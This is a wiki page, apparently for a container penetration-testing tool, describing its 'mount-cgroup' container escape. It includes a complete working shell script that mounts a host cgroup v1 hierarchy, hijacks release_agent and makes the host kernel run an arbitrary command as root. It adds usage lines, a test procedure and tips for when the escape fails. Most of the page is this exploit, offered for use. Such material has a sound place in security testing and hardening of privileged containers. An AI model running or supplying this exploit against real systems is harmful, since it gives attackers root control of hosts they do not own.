Exploit: mount cgroup

cdxy edited this page Nov 24, 2020 · 1 revision

Exploit: mount-cgroup

Automated escape from a container that shares a cgroup v1 hierarchy with the host. It is mainly used to escape privileged containers (started with --privileged, or otherwise holding CAP_SYS_ADMIN without a seccomp/AppArmor restriction on mount).

The exploit first mounts a host cgroup v1 hierarchy into the container, then hijacks that hierarchy's release_agent file, pointing it at an attacker-controlled script via a path that resolves on the host, and finally triggers execution of the user-specified shell command through the Linux cgroup notify_on_release mechanism: when the last process leaves a child cgroup that has notify_on_release set, the kernel runs the release agent as root in the host's mount and PID namespaces.

Caveat: release_agent and notify_on_release only exist in cgroup v1. On a host that runs cgroup v2 only (no v1 hierarchy can be mounted), this exploit does not apply.
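The mechanism described above, written out as a manual POSIX shell script. This is an added example following the widely circulated release_agent proof of concept; it is not CDK's own code, and the mount point /tmp/cgrp, the script path /cmd and the overlay2 IDs in the sample mtab are made-up names. It assumes the container's root filesystem is an overlayfs mount listed in /etc/mtab (as with Docker's overlay2 driver), that the host exposes a cgroup v1 hierarchy, and that it runs as root with CAP_SYS_ADMIN, e.g. inside a docker --privileged container. Run without arguments it only parses the constructed sample and touches nothing; run as sh escape.sh "touch /tmp/exp-success" inside the container it performs the escape.

```shell
#!/bin/sh
# Manual cgroup v1 release_agent escape (added example, not CDK's own code).
# Assumptions (not from the page): the container root is an overlayfs mount
# listed in /etc/mtab, the host has a cgroup v1 hierarchy, and we run as root
# with CAP_SYS_ADMIN (e.g. docker --privileged). Paths below are illustrative.

# Constructed sample of the mtab lines a Docker container sees; the overlay2
# directory names are made up.
SAMPLE_MTAB='proc /proc proc rw,nosuid,nodev,noexec,relatime 0 0
overlay / overlay rw,relatime,lowerdir=/var/lib/docker/overlay2/l/AAAA:/var/lib/docker/overlay2/l/BBBB,upperdir=/var/lib/docker/overlay2/0123abcd/diff,workdir=/var/lib/docker/overlay2/0123abcd/work 0 0'

# Read mtab on stdin and print the host-side upperdir of the container's "/".
# A file created at /foo inside the container is <upperdir>/foo on the host,
# which is the path the kernel resolves when it executes release_agent.
upperdir_from_mtab() {
    awk '$2 == "/" && $3 == "overlay" { print $4 }' |
        tr ',' '\n' |
        sed -n 's/^upperdir=//p' |
        head -n 1
}

# Build the script the host will run. The kernel executes release_agent with
# the emptied cgroup's path as $1 and a minimal environment, so keep it a
# plain sh script with an absolute interpreter.
agent_script() {
    printf '#!/bin/sh\n%s\n' "$1"
}

# Mount a v1 hierarchy, hijack its release_agent, then empty a child cgroup so
# the kernel runs our script on the host.
cgroup_escape() {
    payload="$1"
    mnt=/tmp/cgrp   # mount point for the host hierarchy (arbitrary)
    agent=/cmd      # script path as seen inside the container (arbitrary)

    if [ "$(id -u)" -ne 0 ]; then
        echo "need root with CAP_SYS_ADMIN" >&2
        return 1
    fi

    upper=$(upperdir_from_mtab < /etc/mtab)
    if [ -z "$upper" ]; then
        echo "could not find overlay upperdir for / in /etc/mtab" >&2
        return 1
    fi

    mkdir -p "$mnt"
    # rdma is rarely used and has no resource semantics; fall back to memory.
    mount -t cgroup -o rdma cgroup "$mnt" 2>/dev/null ||
        mount -t cgroup -o memory cgroup "$mnt" || {
            echo "cgroup v1 mount failed (cgroup v2-only host, or mount denied?)" >&2
            return 1
        }

    mkdir -p "$mnt/x"
    echo 1 > "$mnt/x/notify_on_release"
    # release_agent sits at the hierarchy root and is a host-wide setting.
    echo "$upper$agent" > "$mnt/release_agent"
    agent_script "$payload" > "$agent"
    chmod a+x "$agent"

    # Put a short-lived process into the child cgroup; when it exits the cgroup
    # is empty and the kernel invokes release_agent in the host's namespaces.
    sh -c "echo \$\$ > $mnt/x/cgroup.procs"
}

if [ "$#" -eq 1 ]; then
    cgroup_escape "$1"
else
    # Dry run on the constructed sample: shows the host path that would be
    # written into release_agent, without touching the system.
    echo "usage: $0 '<shell-cmd>'" >&2
    echo "sample upperdir: $(printf '%s\n' "$SAMPLE_MTAB" | upperdir_from_mtab)"
fi
```

The upperdir lookup is the step people most often get wrong: release_agent is interpreted by the host kernel against the host's root filesystem, so a container-relative path such as /cmd silently does nothing. If the escape appears to succeed but the command never runs, compare the path written to release_agent with the actual overlay upperdir on the host.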


Usage

./cdk run mount-cgroup "<shell-cmd>"
# after the exploit runs, the host executes the command passed in <shell-cmd>.

Example

Testing Case

  1. On the host, start a privileged container with the CDK binary mounted into it, then try to escape from inside it using CDK: docker run -v /root/cdk:/cdk --rm -it --privileged ubuntu bash
  2. Inside the container, run ./cdk run mount-cgroup "touch /tmp/exp-success"
  3. Back on the host, check that /tmp/exp-success exists. If it does, the shell command ran on the host as root, and any command passed in <shell-cmd> will run there in the same way.
